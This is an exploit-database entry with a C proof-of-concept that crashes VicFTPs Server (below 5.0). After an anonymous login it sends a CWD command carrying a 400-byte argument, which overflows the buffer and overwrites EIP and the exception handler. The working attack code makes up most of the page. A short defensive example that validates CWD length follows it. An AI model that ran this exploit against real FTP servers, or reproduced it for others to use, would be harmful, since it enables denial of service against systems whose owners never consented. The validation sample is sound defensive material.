
VicFTPS < 5.0 (CWD) Remote Buffer Overflow Exploit PoC

01 Jul 2014 00:00:00 | Reported by Root | Type: seebug | Source: www.seebug.org

VicFTPs Server CWD remote buffer overflow vulnerability, DoS proof of concept. EIP is overwritten at 323. The PoC uses a larger buffer to overwrite the exception handler, preventing an error message.

Code

/*
VicFTPs Server CWD Remote Buffer Overflow Vulnerability
                 DoS Proof of concept

            r0ut3r (writ3r [at] gmail.com)

Thanks to:
Marsu (Marsupilamipowa [at] hotmail.fr)
for helping me out with this vulnerability.

Greets Marsu, and Timq.

Description:
Sending a long argument to CWD will cause VicFTPs Server
to overwrite memory. EIP is overwritten at 323. The POC
uses a larger buffer to overwrite exception handler,
preventing an error message.
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */

#define PORT 21

int s;
struct sockaddr_in sock_addr;

char recvbuf[1024];
char pwn[450];

int main(int argc, char* argv[])
{
    if (argc < 2) {
        printf("Usage: %s <ip>\n", argv[0]);
        return 1;
    }

    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        printf("error with socket\n");
        return 1;
    }

    sock_addr.sin_family = AF_INET;
    sock_addr.sin_addr.s_addr = inet_addr(argv[1]);
    sock_addr.sin_port = htons(PORT);

    if (connect(s, (struct sockaddr *)&sock_addr, sizeof(sock_addr)) == -1) {
        printf("unable to connect\n");
        return 1;
    }

    /* Read the server banner */
    printf("[+] Connected\n");
    memset(recvbuf, '\0', 1024);
    recv(s, recvbuf, 1024, 0);

    /* Anonymous login: USER */
    char userbuf[50];
    printf("[+] Sending user...\n");
    memset(userbuf, '\0', 50);
    strcpy(userbuf, "USER anonymous\r\n");   /* 16 bytes + NUL, fits in 50 */
    if (send(s, userbuf, strlen(userbuf), 0) == -1) {
        printf("unable to send data\n");
        return 1;
    }

    memset(recvbuf, '\0', 1024);
    recv(s, recvbuf, 1024, 0);

    /* Anonymous login: PASS */
    char passbuf[50];
    printf("[+] Sending pass...\n");
    memset(passbuf, '\0', 50);
    strcpy(passbuf, "PASS anonymous\r\n");   /* 16 bytes + NUL, fits in 50 */
    if (send(s, passbuf, strlen(passbuf), 0) == -1) {
        printf("unable to send data\n");
        return 1;
    }
    recv(s, recvbuf, 1024, 0);

    /* CWD followed by a 400-byte argument and CRLF */
    printf("[+] Building payload. \n");
    memset(pwn, '\0', 450);
    memcpy(pwn, "CWD ", 4);
    memset(pwn+4, 'A', 400);
    memcpy(pwn+404, "\r\n", 2);

    printf("[+] Sending payload.\n");
    if (send(s, pwn, strlen(pwn), 0) == -1) {
        printf("unable to send data\n");
        return 1;
    }

    printf("[!] Boom! crashed?!\n");

    return 0;
}

// milw0rm.com [2007-02-18]
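
The overflow described above comes from handling a CWD argument without a length limit. The following server-side check is an added example, not part of the original PoC or of VicFTPs itself; `handle_cwd`, `CWD_MAX_PATH` and the mapping to FTP reply codes are assumptions chosen for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define CWD_MAX_PATH 255 /* assumed policy limit, below the 323-byte offset */
enum { CWD_OK = 250, CWD_UNKNOWN = 500, CWD_REJECT = 501 }; /* FTP reply codes */

/* Hypothetical handler: validate one control line of len bytes (not
 * NUL-terminated) and copy an acceptable CWD path into out[outsz]. */
int handle_cwd(const char *line, size_t len, char *out, size_t outsz)
{
    /* Require a complete line: the terminator must lie inside the buffer. */
    const char *end = memchr(line, '\n', len);
    if (end == NULL)
        return CWD_REJECT;
    if (end > line && end[-1] == '\r')
        end--;

    size_t n = (size_t)(end - line);
    if (n < 4 || toupper((unsigned char)line[0]) != 'C' ||
        toupper((unsigned char)line[1]) != 'W' ||
        toupper((unsigned char)line[2]) != 'D' || line[3] != ' ')
        return CWD_UNKNOWN;

    const char *arg = line + 4;
    size_t arglen = n - 4;

    /* Check the length before any copy; also refuse embedded NUL bytes. */
    if (arglen == 0 || arglen > CWD_MAX_PATH || arglen >= outsz)
        return CWD_REJECT;
    if (memchr(arg, '\0', arglen) != NULL)
        return CWD_REJECT;

    memcpy(out, arg, arglen); /* arglen < outsz was verified above */
    out[arglen] = '\0';
    return CWD_OK;
}

int main(void)
{
    char path[CWD_MAX_PATH + 1], big[406]; /* constructed sample inputs */
    memcpy(big, "CWD ", 4);
    memset(big + 4, 'A', 400); /* same 400-byte argument the PoC sends */
    memcpy(big + 404, "\r\n", 2);
    printf("normal: %d\n", handle_cwd("CWD /pub\r\n", 10, path, sizeof path));
    printf("long:   %d\n", handle_cwd(big, sizeof big, path, sizeof path));
    return 0;
}
```

The same length test can be applied at a proxy or IDS sensor in front of a server that cannot be patched, since it only needs the raw control line.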

                              

Vulners AI Score: 7.1 (High risk)